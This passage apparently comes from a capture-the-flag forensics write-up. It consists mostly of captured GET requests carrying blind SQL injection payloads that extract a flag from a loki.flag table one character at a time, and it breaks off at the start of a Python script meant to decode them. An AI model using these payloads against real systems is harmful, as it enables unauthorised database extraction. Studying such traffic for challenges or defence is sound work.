GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>98 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),22,1))>99 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>102 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),23,1))>101 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),24,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),25,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),26,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),27,1))>109 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),28,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),29,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),30,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),31,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>96 AND '%'='HTTP/1.1cK
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>112 AND '%'='HTTP/1.1cN
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>104 AND '%'='HTTP/1.1cN
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>100 AND '%'='HTTP/1.1cR
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>102 AND '%'='HTTP/1.1cR
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),32,1))>103 AND '%'='HTTP/1.1cV
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>64 AND '%'='HTTP/1.1cV
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>96 AND '%'='HTTP/1.1cY
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>112 AND '%'='HTTP/1.1c\
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>104 AND '%'='HTTP/1.1c\
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>100 AND '%'='HTTP/1.1c_
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>102 AND '%'='HTTP/1.1c_
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),33,1))>101 AND '%'='HTTP/1.1cb
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>64 AND '%'='HTTP/1.1ce
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>96 AND '%'='HTTP/1.1cg
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>80 AND '%'='HTTP/1.1cg
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>88 AND '%'='HTTP/1.1cj
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>92 AND '%'='HTTP/1.1cm
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>94 AND '%'='HTTP/1.1cn
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),34,1))>95 AND '%'='HTTP/1.1cq
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>64 AND '%'='HTTP/1.1cs
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>96 AND '%'='HTTP/1.1cs
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>112 AND '%'='HTTP/1.1cv
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>120 AND '%'='HTTP/1.1cx
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>116 AND '%'='HTTP/1.1cz
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>114 AND '%'='HTTP/1.1c|
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),35,1))>115 AND '%'='HTTP/1.1c}
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),36,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),37,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>106 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),38,1))>107 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),39,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>32 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>48 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>40 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>36 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>34 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),40,1))>33 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>124 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>126 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),41,1))>125 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>32 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>16 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>8 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>4 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>2 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),42,1))>1 AND '%'='HTTP/1.1

Next, we use the following Python script to get the answer; it helps us find the candidate values for each character.

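# Each character is probed with 7 requests; 42 character positions were captured.
PROBES_PER_CHAR = 7
POSITIONS = 42

with open("dataclean") as f:
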